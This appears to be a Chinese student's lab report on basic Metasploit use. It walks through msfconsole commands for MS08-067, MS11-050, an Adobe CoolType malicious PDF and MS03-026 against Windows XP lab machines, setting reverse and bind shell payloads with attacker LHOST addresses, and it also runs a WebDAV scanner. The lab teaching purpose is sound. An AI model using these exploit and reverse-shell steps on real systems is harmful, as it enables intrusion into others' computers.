20155229《网络对抗技术》Exp5:MSF基础应用
实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08-067;
一个针对浏览器的攻击,如ms11-050;
一个针对客户端的攻击,如Adobe;
成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。
主动攻击实践 MS08-067漏洞
msfconsole
进入msf控制台search ms08_067
查看该漏洞
use exploit/windows/smb/ms08_067_netapi
使用该漏洞show payloads
回链攻击载荷set payload generic/shell_reverse_tcp
tcp反向回连set LHOST 192.168.126.128
攻击机的ip地址set LPORT 5229
攻击的端口set RHOST 192.168.126.136
靶机的ip地址set target 0
选择目标系统类型exploit
进行攻击下图中展现了攻击成功
- 在kali中输入
ipconfig
查看靶机的ip地址
- 在XP中查看靶机的ip地址,两者相比较,完全一样。
针对浏览器的攻击 ms11_050
进入
msfconsole
控制台输入
use windows/browser/ms11_050_mshtml_cobjectelement
命令使用ms11_050漏洞输入
set payload windows/meterpreter/reverse_http
命令使用http反向连接设置kali的IP地址
set LHOST 192.168.126.128
设置端口
set LPORT 5229
设置资源标识符路径
set URIPATH fyh5229
进行攻击
exploit
将上图的LOCAL IP 的网址输入进WIN XP中的IE浏览器中,出现遇到问题需要关闭
的窗口。同时360已经给出需要修复的通知。
但是回到KALI建立会话时,IE浏览器已经关闭该网页。
设置浏览器的选项,将安全等级设为最低,且启动了插件设置,但是,会话连接还是失败。。。
会接着研究这个问题的
针对客户端的攻击 Adobe
输入
msfconsole
进入msf控制台输入
search adobe
查找和adobe相关的漏洞我选择了
windows/fileformat/adobe_cooltype_sing
输入
set payload windows/meterpreter/reverse_tcp
使用tcp反向连接设置IP地址及端口号
输入
set FILENAME 5229.pdf
命令生成pdf文件进行攻击
- 下图为成功生成PDF文件的标志。
- 根据存储路径,找到PDF文件并将其放进靶机里。
- 但我找了很久都没有找到该文件,后来,如下图,选择
显示隐藏文件
,这时就能找到隐藏的文件夹了。
- 我先将改文件复制进了我的主机中,立马被360删除了。
- 在msf中进入监听模式
set payload windows/meterpreter/reverse_tcp
tcp反向连接- 设置ip地址和端口号
- 进行攻击
- 在XP上打开5229.pdf文件,kali中显示攻击成功
- 输入ipconfig,显示的是xp的ip地址,证明攻击正确。
辅助模块 webdav
webdav: WebDAV 一种基于 HTTP 1.1协议的通信协议。由于 WebDAV 已与 Windows XP 和 IIS 集成,因此它具有这两者所提供的安全特性。其中包括 Internet 信息服务管理单元中指定的 IIS 权限和 NTFS 文件系统中的自由选择访问控制列表 (DACL)。
- 进入msf控制台
- 使用
show auxiliary
命令显示所有的辅助模块以及他们的用途。
- 选择
scanner/http/webdav_scanner
show options
查看该漏洞的配置选项
- 设置了kali的ip地址和线程
- 进行攻击
- 攻击的结果如上图所示,但是该靶机没有装IIS。
- 参考WindowsXP系统如何启用IIS安装IIS
- 允许
webdav
,再次进行攻击,会得到[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED
的消息。
RPC接口长主机名远程缓冲区溢出漏洞(MS03-026)
Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行的程序无缝地在远程系统上执行代码。
使用
use exploit/windows/dcerpc/ms03_026_dcom
使用
set payload windows/shell_bind_tcp
tcp反向连接show options 查看该漏洞的配置选项
set LHOST 192.168.126.128 设置主机ip
set RHOST 192.168.126.137 设置反弹shell的ip
- 进行攻击,攻击成功,但是没办法建立会话。
"无会话已创建"消息发生的情况:
① 使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,或目标配置有问题。
② 您使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。
根据以上提示,
show options
中显示Windows NT SP3-6a/2000/XP/2003 Universal
都可以使用,检测了自己的虚拟机,且使用Microsoft Windows XP Professional
和Microsoft Windows XP Professional SP2
两个版本的虚拟机,都无法建立会话。检查了所攻击的漏洞,无误。
因为该漏洞与RPC协议还有远程有关,所以我分别打开了虚拟机中的WindowsXP系统安全设置:关闭远程协助和服务(关闭的地方换成打开) 和 XP上显示 ‘RPC 服务器不可用’是什么意思但是还是无法建立会话。
好了,我真的是没法解决这个问题了。。。
实验后问题回答
用自己的话解释什么是exploit,payload,encode.
exploit
英文翻译为利用
,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞。payload
:有效载荷。通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payloadencode
:编码器,用来给payload进行编码,保护payload不被发现
实验总结与体会
这次实验其实不难,但是不代表每次攻击都能成功,也不代表每次攻击都能成功建立会话,我做了好几个实验,成功的占少数,还有些失败的我没写上来。
虽然失败的占多数,但无疑这次实验通过自己查找资料学习漏洞学到了很多知识。
20155229《网络对抗技术》Exp5:MSF基础应用的更多相关文章
- 2018-2019-2 20165205 《网络对抗》 Exp5 MSF基础
2018-2019-2 20165205 <网络对抗> Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1 ...
- 20155227《网络对抗》Exp5 MSF基础应用
20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...
- 20155232《网络对抗》Exp5 MSF基础应用
20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击 ...
- 20155302《网络对抗》Exp5 MSF基础应用
20155302<网络对抗>Exp5 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如 ...
- 20155323刘威良《网络对抗》Exp5 MSF基础应用
20155323刘威良<网络对抗>Exp5 MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实 ...
- 20145301 赵嘉鑫 《网络对抗》Exp5 MSF基础应用
20145301 赵嘉鑫 <网络对抗>Exp5 MSF基础应用 一 实验链接 渗透实验一:MS08_067渗透实验 渗透实验二:MS14_064渗透实验 (首用) 渗透实验三:Adobe ...
- 20145215《网络对抗》Exp5 MSF基础应用
20145215<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码 ...
- 20145208 蔡野 《网络对抗》Exp5 MSF基础应用
20145208 蔡野 <网络对抗>Exp5 MSF基础应用 链接地址 主动攻击:利用ms08_067_netapi进行攻击 对浏览器攻击:MS10-002 对客户端攻击:adobe_to ...
- 20145311王亦徐 《网络对抗技术》 MSF基础应用
20145311王亦徐 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,以ms ...
- 20145325张梓靖 《网络对抗技术》 MSF基础应用
20145325张梓靖 <网络对抗技术> MSF基础应用 实验内容 掌握metasploit的基本应用方式以及常用的三种攻击方式的思路 主动攻击,即对系统的攻击,不需要被攻击方配合,这里以 ...
随机推荐
- SD从零开始33-37
[原创]SD从零开始33 Billing简介 Billing在SD流程链中的集成: Billing document表征SD流程链中的最后功能: Billing document在R/3系统的不同区域 ...
- 小记SharePoint REST API Search和COM
1.管理员身份Visual Studio,新建类项目 SPCOM 2.编写逻辑实现代码 重点关注搜索结果的属性包括: Title,Author,Path,Description,HitHighligh ...
- paste 命令
Linux paste命令用于合并文件的列. paste指令会把每个文件以列对列的方式,一列列地加以合并. 语法: paste [-s][-d <间隔字符>][--help][--vers ...
- Java:运算符的问题
算术运算符: 算术运算符的注意问题 1. 如果对负数取模,可以把模数负号忽略不记,如:5%-2=1.但被模数是负数就另当别论. -5%3=-2:-5%-3=-2:符号跟被模数(左边). 2. 对于除号 ...
- LeetCode 题解之Goat Latin
1.问题描述 2.问题分析 将句子拆分成单词,然后放入vector中,对每一个单词做改变,最后连成句子返回. 3.代码 string toGoatLatin(string S) { vector< ...
- 使用 Azure PowerShell 管理 Azure 虚拟网络和 Windows 虚拟机
Azure 虚拟机使用 Azure 网络进行内部和外部网络通信. 本教程介绍了如何在虚拟网络中创建多个虚拟机 (VM),以及如何在虚拟机之间配置网络连接. 你将学习如何执行以下操作: 创建虚拟网络 创 ...
- Oracle EBS 贷项通知单核销
SELECT cm.trx_number ,fnd_flex_ext.get_segs('SQLGL', 'GL#', gcc.chart_of_accounts_id, ad.code_combin ...
- RecyclerView嵌套TextView时显示文字不全的解决方法之一
先描述一下这个小bug:简单的TextView嵌套RecyclerView作为itemView时,可能会在文本中出现布局覆盖的现象,itemView的布局其实很简单,就是一个RelativeLayou ...
- IIS 安全设置
这近网站中毒,以下把IIS安全设置记录一下,以便查阅. 1.对于不需要执行的目录,将处理程序映射中的编辑功能权限中的脚本去掉,这样即使上传了木马文件在此目录,也是无法执行的. 删除IIS默认的匿名用户 ...
- HTML5中的Canvas详解
什么是Canvas HTML5 <canvas> 元素用于图形的绘制,通过脚本 (通常是JavaScript)来完成.<canvas> 标签只是图形容器,您必须使用脚本来绘制图 ...